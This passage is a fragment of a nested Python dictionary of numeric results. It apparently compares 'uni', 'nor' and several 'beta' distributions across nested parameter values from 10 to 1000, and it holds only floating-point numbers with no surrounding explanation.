{'uni': 0.2104725786341283, 'nor': 0.2799770460973791, 'beta1': 0.20755994599842575, 'beta2': 0.34310666630971454, 'beta4': 0.17526551053955433}, 150: {'uni': 0.2096991276282607, 'nor': 0.25909354880735697, 'beta1': 0.21020106280412626, 'beta2': 0.3026139672022534, 'beta4': 0.18019983975383427}, 100: {'uni': 0.21072783143131407, 'nor': 0.2441372701363183, 'beta1': 0.2103056697850539, 'beta2': 0.26482028071061453, 'beta4': 0.18743887187889346}, 75: {'uni': 0.21105992437147847, 'nor': 0.23961175954975408, 'beta1': 0.20974892521253838, 'beta2': 0.25146456182551963, 'beta4': 0.1945200088246506}, 50: {'uni': 0.21121839060128927, 'nor': 0.22491565366984967, 'beta1': 0.20657380975370745, 'beta2': 0.23555742098780033, 'beta4': 0.19921377300790927}, 30: {'uni': 0.210239619388815, 'nor': 0.22117997080110338, 'beta1': 0.2090488783845568, 'beta2': 0.22806384829930174, 'beta4': 0.2023335447482615}, 20: 
{'uni': 0.20710380380206825, 'nor': 0.21627486248329422, 'beta1': 0.20980239596055913, 'beta2': 0.22058570136671965, 'beta4': 0.20218103858951156}, 10: {'uni': 0.21015959409654134, 'nor': 0.21454425127510138, 'beta1': 0.2118316634707065, 'beta2': 0.21620662628256074, 'beta4': 0.20829747772817003}}, 300: {1000: {'uni': 0.21024825533358832, 'nor': 0.6739178980512721, 'beta1': 0.2085070129937928, 'beta2': 1.0261291442854992, 'beta4': 0.12715583194445038}, 750: {'uni': 0.2118817480727133, 'nor': 0.5637239937328892, 'beta1': 0.21166510216163434, 'beta2': 0.7773995918748892, 'beta4': 0.1324222831320455}, 500: {'uni': 0.2098650271914982, 'nor': 0.4371006134554429, 'beta1': 0.20733569395123477, 'beta2': 0.5680527516013063, 'beta4': 0.14332521349654906}, 400: {'uni': 0.2083566386881128, 'nor': 0.3942554582663016, 'beta1': 0.2109565236914346, 'beta2': 0.49603828475465767, 'beta4': 0.15004299961046552}, 300: {'uni': 0.2100854250121582, 'nor': 0.35012881881465224, 'beta1': 0.20823701579975476, 'beta2': 0.44755108426014584, 'beta4': 0.15584642690437633}, 200: {'uni': 0.2097480900554049, 'nor': 0.29687244055718565, 'beta1': 0.21075844321998985, 'beta2': 0.3656759955352811, 'beta4': 0.16579343571612243}, 150: {'uni': 0.20568174343660908, 'nor': 0.27935310252324946, 'beta1': 0.20756684708571857, 'beta2': 0.3228522288000466, 'beta4': 0.17502874843773394}, 100: {'uni': 0.20807636324904133, 'nor': 0.257139917737112, 'beta1': 0.21060259493504813, 'beta2': 0.28415204574523667, 'beta4': 0.18088846276906836}, 75: {'uni': 0.20708717304715557, 'nor': 0.245123598107367, 'beta1': 0.21219451365636394, 'beta2': 0.26166242982354787, 'beta4': 0.18805634454725603}, 50: {'uni': 0.21114468570411718, 'nor': 0.23207945600734575, 'beta1': 0.20959999471878374, 'beta2': 0.24206775007689266, 'beta4': 0.19335277680526938}, 30: {'uni': 0.20889523163632018, 'nor': 0.22229036893037993, 'beta1': 0.2106596749268794, 'beta2': 0.22937469799168445, 'beta4': 0.1989194572736962}, 20: {'uni': 0.2102417437445108, 
'nor': 0.22075709709390393, 'beta1': 0.20895525479901536, 'beta2': 0.22010616263145255, 'beta4': 0.20157150517012473}, 10: {'uni': 0.20971114225447923, 'nor': 0.21561068929125432, 'beta1': 0.21213500548933353, 'beta2': 0.2138950648584445, 'beta4': 0.20638012090126817}}, 200: {1000: {'uni': 0.2132043812817941, 'nor': 0.9112094985009763, 'beta1': 0.21016177088672316, 'beta2': 1.1300645808309855, 'beta4': 0.1220144503244021}, 750: {'uni': 0.21020500282826535, 'nor': 0.7303054388794163, 'beta1': 0.2082163820708222, 'beta2': 0.8966738981783481, 'beta4': 0.12513962151857672}, 500: {'uni': 0.21072696514065975, 'nor': 0.548060627369271, 'beta1': 0.2081097778706287, 'beta2': 0.6558892676359798, 'beta4': 0.13425940545320267}, 400: {'uni': 0.20826445824295223, 'nor': 0.4719804690803897, 'beta1': 0.20898168226932218, 'beta2': 0.6139619653605363, 'beta4': 0.14021057525633163}, 300: {'uni': 0.2088021243690594, 'nor': 0.41713866780936254, 'beta1': 0.2087285946134042, 'beta2': 0.5038582733443089, 'beta4': 0.14660369998262146}, 200: {'uni': 0.2095189003633896, 'nor': 0.34807203300134953, 'beta1': 0.21047061569599942, 'beta2': 0.3977231148120064, 'beta4': 0.156646349521216}, 150: {'uni': 0.2093387615726338, 'nor': 0.3085400352109468, 'beta1': 0.20643570767629546, 'beta2': 0.3615010078549322, 'beta4': 0.16375551575980912}, 100: {'uni': 0.21064378643772108, 'nor': 0.28151818018358465, 'beta1': 0.2090926446634528, 'beta2': 0.30632844588543734, 'beta4': 0.17625942352213347}, 75: {'uni': 0.20671027913469828, 'nor': 0.2618837476630965, 'beta1': 0.2088637313648498, 'beta2': 0.2742687431604851, 'beta4': 0.1779630781714797}, 50: {'uni': 0.20687981613909145, 'nor': 0.2452119427254388, 'beta1': 0.2096125229272614, 'beta2': 0.2528198013170253, 'beta4': 0.18932221495486176}, 30: {'uni': 0.20986940612030017, 'nor': 0.23138385594723265, 'beta1': 0.21273630607793315, 'beta2': 0.23562615341383045, 'beta4': 0.19662520636393377}, 20: {'uni': 0.2096800769725957, 'nor': 0.2219903761746839, 'beta1': 
0.208530873235143, 'beta2': 0.22519313310665248, 'beta4': 0.20072480517089764}, 10: {'uni': 0.20995102667780532, 'nor': 0.21809511923800973, 'beta1': 0.21113193936796237, 'beta2': 0.21507494725665083, 'beta4': 0.20129922751033036}}, 150: {1000: {'uni': 0.21848728221083116, 'nor': 1.1494726368233732, 'beta1': 0.20925879994061328, 'beta2': 1.2847422292556834, 'beta4': 0.11801063285369316}, 750: {'uni': 0.21006532285377288, 'nor': 0.9160472232808671, 'beta1': 0.21041748896864573, 'beta2': 0.9842221927965498, 'beta4': 0.120532017454987}, 500: {'uni': 0.2109702173498153, 'nor': 0.6730564167022827, 'beta1': 0.20805261563312868, 'beta2': 0.8093562303980775, 'beta4': 0.1285665146333448}, 400: {'uni': 0.21151275112656406, 'nor': 0.5927363236218804, 'beta1': 0.21031761704813068, 'beta2': 0.6698968663874326, 'beta4': 0.1308993211614878}, 300: {'uni': 0.21116665878281402, 'nor': 0.4896592957082567, 'beta1': 0.20684320922443974, 'beta2': 0.5512275592001699, 'beta4': 0.1384612397829126}, 200: {'uni': 0.2065247059685983, 'nor': 0.39835048373839826, 'beta1': 0.21174588540195607, 'beta2': 0.44630982353810156, 'beta4': 0.14805783066157965}, 150: {'uni': 0.20928770803093008, 'nor': 0.34961127920202617, 'beta1': 0.2109639639405676, 'beta2': 0.3797293742818744, 'beta4': 0.15746136802847555}, 100: {'uni': 0.20516824818584412, 'nor': 0.3028139312794487, 'beta1': 0.20853523204098995, 'beta2': 0.32225079750893787, 'beta4': 0.16753709332890135}, 75: {'uni': 0.20502748437818377, 'nor': 0.2741211171871183, 'beta1': 0.2105448811718868, 'beta2': 0.29080653527776035, 'beta4': 0.17337872442507027}, 50: {'uni': 0.20975717836080796, 'nor': 0.2565379219984574, 'beta1': 0.20800987078537114, 'beta2': 0.2600989628289811, 'beta4': 0.18429779524384918}, 30: {'uni': 0.20720342119680604, 'nor': 0.24088086582328805, 'beta1': 0.20748583588931385, 'beta2': 0.24007860960850408, 'beta4': 0.19211149401323768}, 20: {'uni': 0.20755790128204296, 'nor': 0.22922666615794668, 'beta1': 0.21085331137645344, 'beta2': 
0.2271126160773065, 'beta4': 0.19726350188991543}, 10: {'uni': 0.2115436004822682, 'nor': 0.21966947518702792, 'beta1': 0.21107364597857337, 'beta2': 0.22048945023217323, 'beta4': 0.20507045435880536}}, 100: {1000: {'uni': 0.21967845045275625, 'nor': 1.656278094432771, 'beta1': 0.21090054785594217, 'beta2': 1.405234644927156, 'beta4': 0.1134712510665932}, 750: {'uni': 0.2182058622345823, 'nor': 1.265623071214558, 'beta1': 0.21028572752611807, 'beta2': 1.1279524417411784, 'beta4': 0.11526715616074444}, 500: {'uni': 0.21472950659279263, 'nor': 0.9157340420582806, 'beta1': 0.20915259969907926, 'beta2': 0.8857345708052237, 'beta4': 0.11958569682583288}, 400: {'uni': 0.21489446434289045, 'nor': 0.7677784731205918, 'beta1': 0.21081206178893352, 'beta2': 0.7609743126081624, 'beta4': 0.12541109277349732}, 300: {'uni': 0.2159893589251412, 'nor': 0.6256342238393243, 'beta1': 0.20763666455794746, 'beta2': 0.6119368944285761, 'beta4': 0.13023773680445308}, 200: {'uni': 0.2091742902933585, 'nor': 0.48879729015887435, 'beta1': 0.20831908379432781, 'beta2': 0.4888715032902842, 'beta4': 0.13778468684559775}, 150: {'uni': 0.2090160321323569, 'nor': 0.4187490294676396, 'beta1': 0.2109398590174564, 'beta2': 0.43024124336877606, 'beta4': 0.1462052336856702}, 100: {'uni': 0.2104322507772914, 'nor': 0.35145353863818374, 'beta1': 0.2078275315127688, 'beta2': 0.3527286738203107, 'beta4': 0.15819495462335323}, 75: {'uni': 0.20969432604237917, 'nor': 0.3190469158495116, 'beta1': 0.2123788151559664, 'beta2': 0.31885461616358585, 'beta4': 0.16304448328983254}, 50: {'uni': 0.2087204645903672, 'nor': 0.2784565063957156, 'beta1': 0.20898686396465999, 'beta2': 0.2724721715932801, 'beta4': 0.1748949757811885}, 30: {'uni': 0.21180576782357857, 'nor': 0.2510792661255587, 'beta1': 0.21157574079679234, 'beta2': 0.2492653810399887, 'beta4': 0.18637405643646768}, 20: {'uni': 0.20986822684158538, 'nor': 0.24044968609243367, 'beta1': 0.20976936068946686, 'beta2': 0.22969757707032978, 'beta4': 
0.1933966348868532}, 10: {'uni': 0.2092931057812649, 'nor': 0.2274358627877835, 'beta1': 0.20973251389792952, 'beta2': 0.22006451815316508, 'beta4': 0.20444803640329232}}, 75: {1000: {'uni': 0.23513931545998662, 'nor': 2.084909469742905, 'beta1': 0.21014505352475218, 'beta2': 1.5806301519779993, 'beta4': 0.10998758656318001}, 750: {'uni': 0.2286541491929865, 'nor': 1.6373557492661108, 'beta1': 0.20978951011443275, 'beta2': 1.2456465113380724, 'beta4': 0.11259632219485577}, 500: {'uni': 0.22247281469777053, 'nor': 1.150511057022818, 'beta1': 0.2073585482490993, 'beta2': 0.9812552247229969, 'beta4': 0.11625486022546717}, 400: {'uni': 0.21951372585892182, 'nor': 0.9569843642606499, 'beta1': 0.20823968509523264, 'beta2': 0.8066142797690702, 'beta4': 0.12044519385671562}, 300: {'uni': 0.21781287693048623, 'nor': 0.7725858773053905, 'beta1': 0.21194743463485233, 'beta2': 0.6922651737298109, 'beta4': 0.12461002806743086}, 200: {'uni': 0.21199124103966535, 'nor': 0.580982989647824, 'beta1': 0.20939209173887577, 'beta2': 0.5462914146214966, 'beta4': 0.13270550013960777}, 150: {'uni': 0.21252879710179673, 'nor': 0.4987347923010613, 'beta1': 0.20783211493381504, 'beta2': 0.45356054189282985, 'beta4': 0.13809523671194257}, 100: {'uni': 0.2089361893031747, 'nor': 0.403915226761567, 'beta1': 0.2093217404846438, 'beta2': 0.38016607644734646, 'beta4': 0.14840466776444083}, 75: {'uni': 0.2081440553080188, 'nor': 0.35109507781411226, 'beta1': 0.20929729980155615, 'beta2': 0.3327341468495961, 'beta4': 0.1540449114797875}, 50: {'uni': 0.20581675234683908, 'nor': 0.30206067979551837, 'beta1': 0.21021696834721026, 'beta2': 0.2861955478547944, 'beta4': 0.16633361029387916}, 30: {'uni': 0.20734524509571534, 'nor': 0.267037913698908, 'beta1': 0.2070263091653566, 'beta2': 0.25806159877220175, 'beta4': 0.17863030675847164}, 20: {'uni': 0.2096733930631222, 'nor': 0.2460070167669823, 'beta1': 0.20871469364964274, 'beta2': 0.2372662315858424, 'beta4': 0.1892580676002318}, 10: {'uni': 
0.20922208007633622, 'nor': 0.23213075562898852, 'beta1': 0.21070476962686652, 'beta2': 0.2225315024021926, 'beta4': 0.19641028263808016}}, 50: {1000: {'uni': 0.2695254349236613, 'nor': 3.142691210261647, 'beta1': 0.21770786185287255, 'beta2': 1.9099319895352667, 'beta4': 0.10829969370253238}, 750: {'uni': 0.2588039542291625, 'nor': 2.4104366375812973, 'beta1': 0.21243577719321954, 'beta2': 1.5161955837891, 'beta4': 0.11111092000239313}, 500: {'uni': 0.24151301038044345, 'nor': 1.642139887107223, 'beta1': 0.20971867796492333, 'beta2': 1.1517381077121902, 'beta4': 0.11227898068455419}, 400: {'uni': 0.23019437797823078, 'nor': 1.3289789466534643, 'beta1': 0.20926242715400342, 'beta2': 0.9729778013434685, 'beta4': 0.11417269932418249}, 300: {'uni': 0.22430893764793297, 'nor': 1.0745150609309957, 'beta1': 0.21074805474629227, 'beta2': 0.7874596109511961, 'beta4': 0.11759814856362567}, 200: {'uni': 0.21975399445220514, 'nor': 0.7819720121056168, 'beta1': 0.21103937980028964, 'beta2': 0.6018534363417153, 'beta4': 0.12339286742106902}, 150: {'uni': 0.21535142554197367, 'nor': 0.6399318456941945, 'beta1': 0.20746526428424497, 'beta2': 0.5252845548984273, 'beta4': 0.1299381165608297}, 100: {'uni': 0.2123454504262325, 'nor': 0.49216704078244555, 'beta1': 0.2107022782636202, 'beta2': 0.4230176226912828, 'beta4': 0.1378036793670446}, 75: {'uni': 0.21339732015322407, 'nor': 0.43149068654833117, 'beta1': 0.21058764807741492, 'beta2': 0.3671011243377202, 'beta4': 0.14620561061096438}, 50: {'uni': 0.205847661172318, 'nor': 0.35582897249323403, 'beta1': 0.20909648270681516, 'beta2': 0.31178396791388713, 'beta4': 0.15722296123371624}, 30: {'uni': 0.20934069442572217, 'nor': 0.29138119383616384, 'beta1': 0.20982580627900296, 'beta2': 0.26854176799687446, 'beta4': 0.17071014481863203}, 20: {'uni': 0.20668196194747926, 'nor': 0.26568332305135134, 'beta1': 0.2093142297545193, 'beta2': 0.24526630860745893, 'beta4': 0.17811324491132643}, 10: {'uni': 0.20958328438574503, 'nor': 
0.23896053895205074, 'beta1': 0.20621410607741605, 'beta2': 0.22919187002100394, 'beta4': 0.19431842828786478}}, 30: {1000: {'uni': 0.39110763945461735, 'nor': 5.116424860683267, 'beta1': 0.2276039800167104, 'beta2': 2.4580179105664364, 'beta4': 0.1066835465038891}, 750: {'uni': 0.3418714368913198, 'nor': 3.8744007700100593, 'beta1': 0.22395548891655492, 'beta2': 2.0103017113808224, 'beta4': 0.10947374482580367}, 500: {'uni': 0.2975942162732659, 'nor': 2.6218136300691874, 'beta1': 0.21825444046578688, 'beta2': 1.3847556622818173, 'beta4': 0.10899418892034965}, 400: {'uni': 0.27461362852151405, 'nor': 2.1151034436155616, 'beta1': 0.2171198331223813, 'beta2': 1.2167467458708006, 'beta4': 0.11163855842113928}, 300: {'uni': 0.2543881091715356, 'nor': 1.6452365204119028, 'beta1': 0.212256506611666, 'beta2': 0.9687476062374452, 'beta4': 0.1115492019613656}, 200: {'uni': 0.2363522619554879, 'nor': 1.1677455360609652, 'beta1': 0.20966125872182179, 'beta2': 0.7425629231901374, 'beta4': 0.11625099173205072}, 150: {'uni': 0.2284148219949321, 'nor': 0.9574829237962695, 'beta1': 0.21023861819542058, 'beta2': 0.6139346611358466, 'beta4': 0.12009639988691045}, 100: {'uni': 0.22172498485669878, 'nor': 0.6915027995999989, 'beta1': 0.20918706109846394, 'beta2': 0.4869056843738299, 'beta4': 0.12638594109716492}, 75: {'uni': 0.2133168698992867, 'nor': 0.5682112038946274, 'beta1': 0.20975000504788754, 'beta2': 0.415282241094064, 'beta4': 0.13226527569518623}, 50: {'uni': 0.2102271307152469, 'nor': 0.44595128782042287, 'beta1': 0.20889065230992968, 'beta2': 0.3465767337644295, 'beta4': 0.14070658143472944}, 30: {'uni': 0.2081426512303808, 'nor': 0.35207891188712104, 'beta1': 0.20871532977976312, 'beta2': 0.29316990128238446, 'beta4': 0.15666183548008356}, 20: {'uni': 0.20613997335614362, 'nor': 0.30583981878707406, 'beta1': 0.20836781704793886, 'beta2': 0.2598156056480911, 'beta4': 0.16790033081050695}, 10: {'uni': 0.20923753020638328, 'nor': 0.2612046113020479, 'beta1': 
0.20989685334843394, 'beta2': 0.23114069560918055, 'beta4': 0.1835407880975625}}, 20: {1000: {'uni': 0.6207826394599372, 'nor': 7.622424720173352, 'beta1': 0.27350677793760486, 'beta2': 3.3492996942172333, 'beta4': 0.10628262555709497}, 750: {'uni': 0.5048166737138563, 'nor': 5.758152270393112, 'beta1': 0.2554155723862364, 'beta2': 2.628076590546046, 'beta4': 0.10565019639609735}, 500: {'uni': 0.3994453354156638, 'nor': 3.893980758511552, 'beta1': 0.23597727883342787, 'beta2': 1.8214218995092328, 'beta4': 0.1070101907165029}, 400: {'uni': 0.36101676480694145, 'nor': 3.2044600872159323, 'beta1': 0.23459375200447094, 'beta2': 1.5251543211986895, 'beta4': 0.10821295023254038}, 300: {'uni': 0.3141921739962661, 'nor': 2.4222433418314364, 'beta1': 0.2253430945453138, 'beta2': 1.1967541480073822, 'beta4': 0.1099708991006131}, 200: {'uni': 0.27835872559274455, 'nor': 1.681652690097508, 'beta1': 0.21894420597565414, 'beta2': 0.8889375477356823, 'beta4': 0.11351788787975257}, 150: {'uni': 0.2559570089433474, 'nor': 1.3438963170616764, 'beta1': 0.21477483270291053, 'beta2': 0.7257408247226198, 'beta4': 0.11394879683852287}, 100: {'uni': 0.23822025966558683, 'nor': 0.9711825862107801, 'beta1': 0.20802563703769897, 'beta2': 0.5623026745072711, 'beta4': 0.12026175575681236}, 75: {'uni': 0.2293403279687202, 'nor': 0.7729220747351444, 'beta1': 0.21100752732670153, 'beta2': 0.48330787981629864, 'beta4': 0.12382986936052359}, 50: {'uni': 0.21915378007158956, 'nor': 0.5693299836933317, 'beta1': 0.2078415744294394, 'beta2': 0.38674682907023844, 'beta4': 0.13204002010791535}, 30: {'uni': 0.2082265622167124, 'nor': 0.43443417831024433, 'beta1': 0.20687391089208745, 'beta2': 0.31119395493380003, 'beta4': 0.1431516191386846}, 20: {'uni': 0.20786603570028708, 'nor': 0.3572940044777373, 'beta1': 0.20719910244124543, 'beta2': 0.27721462641843725, 'beta4': 0.1572608236251125}, 10: {'uni': 0.20369256732614355, 'nor': 0.28182536192865026, 'beta1': 0.20756249721014605, 'beta2': 
0.2385183054251573, 'beta4': 0.1697626070090186}}, 10: {1000: {'uni': 1.7848701057995784, 'nor': 15.635739381402702, 'beta1': 0.7153891703487703, 'beta2': 5.697088420798187, 'beta4': 0.10421112845871394}, 750: {'uni': 1.3727979678132771, 'nor': 11.906755261463388, 'beta1': 0.5779728985731243, 'beta2': 4.449716590642079, 'beta4': 0.10498414486075403}, 500: {'uni': 0.9573992786589071, 'nor': 7.970320890499278, 'beta1': 0.43798339579132395, 'beta2': 2.974231536993935, 'beta4': 0.105026735404256}, 400: {'uni': 0.7914977735882762, 'nor': 6.440897945489786, 'beta1': 0.39007392596960755, 'beta2': 2.429667687774588, 'beta4': 0.10605337636852458}, 300: {'uni': 0.631330878442672, 'nor': 4.933284287935752, 'beta1': 0.33438904339835235, 'beta2': 1.877753461391385, 'beta4': 0.1073668070340185}, 200: {'uni': 0.48173020420613244, 'nor': 3.3803827492127008, 'beta1': 0.28744959584371677, 'beta2': 1.3439600818077662, 'beta4': 0.10776359310849748}, 150: {'uni': 0.40031324179507105, 'nor': 2.57622592994642, 'beta1': 0.26035189199173386, 'beta2': 1.0427967524110597, 'beta4': 0.11000574720566421}, 100: {'uni': 0.3308720201998832, 'nor': 1.7649850100433184, 'beta1': 0.2383561944351031, 'beta2': 0.7771083680176007, 'beta4': 0.11235247896090703}, 75: {'uni': 0.2865533700253337, 'nor': 1.3593086400799728, 'beta1': 0.23083619480349551, 'beta2': 0.6354900601807595, 'beta4': 0.1136946403621595}, 50: {'uni': 0.25864424310430745, 'nor': 0.9824603279253074, 'beta1': 0.22334506582001382, 'beta2': 0.49223837414214233, 'beta4': 0.12081061110449474}, 30: {'uni': 0.22836973422604787, 'nor': 0.676619660745287, 'beta1': 0.20951021970104433, 'beta2': 0.3741306279869527, 'beta4': 0.12652156529997072}, 20: {'uni': 0.21515643043692204, 'nor': 0.5180809461964594, 'beta1': 0.20397488858742926, 'beta2': 0.3088295715698039, 'beta4': 0.13725565024846206}, 10: {'uni': 0.20341357315487396, 'nor': 0.3736834213121383, 'beta1': 0.20162371182875433, 'beta2': 0.24957048788715058, 'beta4': 0.15490910948174905}}}, 0.3: 
{1000: {1000: {'uni': 0.18428871913527797, 'nor': 0.30135078484266026, 'beta1': 0.18393654917719088, 'beta2': 0.6623093381207533, 'beta4': 0.14032810218137845}, 750: {'uni': 0.18262805116604833, 'nor': 0.27195486539150565, 'beta1': 0.18602130658962418, 'beta2': 0.4878718144267021, 'beta4': 0.14691168329765347}, 500: {'uni': 0.18356636941170307, 'nor': 0.2416953142020874, 'beta1': 0.18423960757549646, 'beta2': 0.357987213680477, 'beta4': 0.15566079017126216}, 400: {'uni': 0.18398269310746806, 'nor': 0.23033211237917395, 'beta1': 0.18313599133249095, 'beta2': 0.31498091495327957, 'beta4': 0.15747557950230512}, 300: {'uni': 0.18359581287903043, 'nor': 0.21664672148715478, 'beta1': 0.1859716509858502, 'beta2': 0.27672572480296337, 'beta4': 0.16484989128991967}, 200: {'uni': 0.18292786874448827, 'nor': 0.20406786775434288, 'beta1': 0.1842414647509748, 'beta2': 0.24027300035558413, 'beta4': 0.1699466212939197}, 150: {'uni': 0.18455107320985933, 'nor': 0.20188485575373824, 'beta1': 0.18479437012880134, 'beta2': 0.22923323632544906, 'beta4': 0.16924173674935705}, 100: {'uni': 0.18513992851403205, 'nor': 0.19487665525991182, 'beta1': 0.18489669398913675, 'beta2': 0.20828847343235687, 'beta4': 0.17566406407424956}, 75: {'uni': 0.1865632455464677, 'nor': 0.19358711616627014, 'beta1': 0.18565141251922007, 'beta2': 0.20582303873952032, 'beta4': 0.1791155456720297}, 50: {'uni': 0.18426457302663726, 'nor': 0.1916482647518717, 'beta1': 0.1852315833036702, 'beta2': 0.19764339843274478, 'beta4': 0.18112274314507698}, 30: {'uni': 0.18349819467351894, 'nor': 0.1888489836368484, 'beta1': 0.18261593670270432, 'beta2': 0.19034464682698157, 'beta4': 0.18224418746461715}, 20: {'uni': 0.1820714679130019, 'nor': 0.18754105929514656, 'beta1': 0.18430122581588568, 'beta2': 0.1920075339274084, 'beta4': 0.1834021882349476}, 10: {'uni': 0.18739411665561917, 'nor': 0.18497627238155476, 'beta1': 0.18440842636140978, 'beta2': 0.18841016365805804, 'beta4': 0.1846995716387348}}, 750: {1000: {'uni': 
0.18374768272406486, 'nor': 0.3362941599325207, 'beta1': 0.18340789412067696, 'beta2': 0.664773656168264, 'beta4': 0.13309238170252863}, 750: {'uni': 0.18528145820779707, 'nor': 0.30013344141016346, 'beta1': 0.1831987566147265, 'beta2': 0.5032347489310731, 'beta4': 0.1410482071937854}, 500: {'uni': 0.18484168589686367, 'nor': 0.2605615429499437, 'beta1': 0.18463915891771657, 'beta2': 0.3713535347423807, 'beta4': 0.14822832304391478}, 400: {'uni': 0.18311116918143328, 'nor': 0.2459445558763436, 'beta1': 0.1845402672165048, 'beta2': 0.31907073757767096, 'beta4': 0.15317162329719258}, 300: {'uni': 0.18617543522232655, 'nor': 0.2298916232269604, 'beta1': 0.18461903342585026, 'beta2': 0.28363567342745244, 'beta4': 0.16036130415744101}, 200: {'uni': 0.18393910883726228, 'nor': 0.21640952080746054, 'beta1': 0.1818765723127742, 'beta2': 0.25012191141345425, 'beta4': 0.16552665865239316}, 150: {'uni': 0.18417926544247398, 'nor': 0.21092728516574843, 'beta1': 0.18212118551922038, 'beta2': 0.23142014151434875, 'beta4': 0.17002055544787953}, 100: {'uni': 0.18660805942978306, 'nor': 0.20081262797470406, 'beta1': 0.18602127924312306, 'beta2': 0.21271648680506355, 'beta4': 0.17563839287175947}, 75: {'uni': 0.18251540717557313, 'nor': 0.19535814734848456, 'beta1': 0.18595619280052217, 'beta2': 0.20594100979366686, 'beta4': 0.17820076426208542}, 50: {'uni': 0.18539776665656268, 'nor': 0.18951186752224017, 'beta1': 0.1852697716498855, 'beta2': 0.19992731375199027, 'beta4': 0.1784937421131358}, 30: {'uni': 0.18536533904676694, 'nor': 0.18935679046326837, 'beta1': 0.1841613478222738, 'beta2': 0.1916231974678531, 'beta4': 0.18187773474697502}, 20: {'uni': 0.1848315245851324, 'nor': 0.18898711958365183, 'beta1': 0.18464481892838294, 'beta2': 0.19085126812258635, 'beta4': 0.1811843211494424}, 10: {'uni': 0.18587075842322476, 'nor': 0.18597838609621442, 'beta1': 0.18573865004138826, 'beta2': 0.18763548127142246, 'beta4': 0.18370702416582232}}, 500: {1000: {'uni': 0.1840197346218617, 
'nor': 0.41329662361079555, 'beta1': 0.18357700766562535, 'beta2': 0.7671344496261001, 'beta4': 0.1239289639044978}, 750: {'uni': 0.1862202743865642, 'nor': 0.3558982422843902, 'beta1': 0.18378140850915506, 'beta2': 0.564532583117132, 'beta4': 0.13340893800976383}, 500: {'uni': 0.1867485748124686, 'nor': 0.2977486468510908, 'beta1': 0.18390546912974548, 'beta2': 0.4195979083937472, 'beta4': 0.14038875085337116}, 400: {'uni': 0.18301639686674334, 'nor': 0.2769565773370171, 'beta1': 0.18366710919376103, 'beta2': 0.3628265004684875, 'beta4': 0.14451613900496404}, 300: {'uni': 0.18217744868887228, 'nor': 0.25629722024533996, 'beta1': 0.18385836640021477, 'beta2': 0.3176579397228085, 'beta4': 0.1524618313858445}, 200: {'uni': 0.18381375844550923, 'nor': 0.23550026000616722, 'beta1': 0.18438255429091854, 'beta2': 0.2656404724828914, 'beta4': 0.16063694634139747}, 150: {'uni': 0.185767292870415, 'nor': 0.21655429857888203, 'beta1': 0.18544627228662178, 'beta2': 0.24932819367864345, 'beta4': 0.16092725112085177}, 100: {'uni': 0.183824799626394, 'nor': 0.20477567037634878, 'beta1': 0.18240757458040802, 'beta2': 0.2309883526806697, 'beta4': 0.16967806719643808}, 75: {'uni': 0.18605984660927738, 'nor': 0.2028444202047503, 'beta1': 0.18483867144383112, 'beta2': 0.21138880444392175, 'beta4': 0.17257719810968203}, 50: {'uni': 0.1839877971831852, 'nor': 0.19904840183947525, 'beta1': 0.18435011648014876, 'beta2': 0.2031296680146621, 'beta4': 0.17697434657873212}, 30: {'uni': 0.1852975402896129, 'nor': 0.1937864670123576, 'beta1': 0.1844117140912648, 'beta2': 0.19398025817323694, 'beta4': 0.1787671102793916}, 20: {'uni': 0.1835863762986978, 'nor': 0.18775276741046626, 'beta1': 0.1854475463987617, 'beta2': 0.19424887742008315, 'beta4': 0.1825324678833545}, 10: {'uni': 0.18547874179765314, 'nor': 0.18647231053828683, 'beta1': 0.18691385489683274, 'beta2': 0.18948179328044443, 'beta4': 0.18672470390138896}}, 400: {1000: {'uni': 0.1841369848304773, 'nor': 0.487660743593779, 'beta1': 
0.18603853288523334, 'beta2': 0.7559165215470582, 'beta4': 0.12068379560836835}, 750: {'uni': 0.18594200781108275, 'nor': 0.4019961108476163, 'beta1': 0.1831083524376866, 'beta2': 0.5621271751603673, 'beta4': 0.12505172473964998}, 500: {'uni': 0.18127077759894958, 'nor': 0.33508422714167163, 'beta1': 0.18535703359501093, 'beta2': 0.41486646451853243, 'beta4': 0.13358961945450476}, 400: {'uni': 0.18847261367235257, 'nor': 0.30475927406457665, 'beta1': 0.18497037370002964, 'beta2': 0.36875432228911315, 'beta4': 0.14131860591700407}, 300: {'uni': 0.1834846960752523, 'nor': 0.27353443866255184, 'beta1': 0.1834736799127996, 'beta2': 0.3187931017458791, 'beta4': 0.14680948452922632}, 200: {'uni': 0.18409437296619705, 'nor': 0.24217133661747858, 'beta1': 0.18522243948305703, 'beta2': 0.28587114638809447, 'beta4': 0.15505648619089624}, 150: {'uni': 0.18244003118893568, 'nor': 0.226720503763241, 'beta1': 0.18452371980644955, 'beta2': 0.2611888455461119, 'beta4': 0.16155402213844164}, 100: {'uni': 0.18514469973669406, 'nor': 0.21427742853579504, 'beta1': 0.1851360561865889, 'beta2': 0.22915500414895795, 'beta4': 0.16887082288872826}, 75: {'uni': 0.1835023368961724, 'nor': 0.20486594519436654, 'beta1': 0.18377651974601344, 'beta2': 0.21901133656471286, 'beta4': 0.17287421533479064}, 50: {'uni': 0.18342146941233753, 'nor': 0.19818564803314914, 'beta1': 0.18651883278191514, 'beta2': 0.20678119783042662, 'beta4': 0.1747652506641469}, 30: {'uni': 0.18552948646943832, 'nor': 0.1935765150016701, 'beta1': 0.18278857493937808, 'beta2': 0.19611341856361825, 'beta4': 0.17788395999027673}, 20: {'uni': 0.1854587786790248, 'nor': 0.1919505201797072, 'beta1': 0.18541896834325705, 'beta2': 0.19533887086414536, 'beta4': 0.18198315689749184}, 10: {'uni': 0.18885914557340622, 'nor': 0.18992736227894721, 'beta1': 0.1849685952581873, 'beta2': 0.19142863221490666, 'beta4': 0.18437904185055504}}, 300: {1000: {'uni': 0.1859502958978716, 'nor': 0.572254915990919, 'beta1': 0.18506222558285604, 
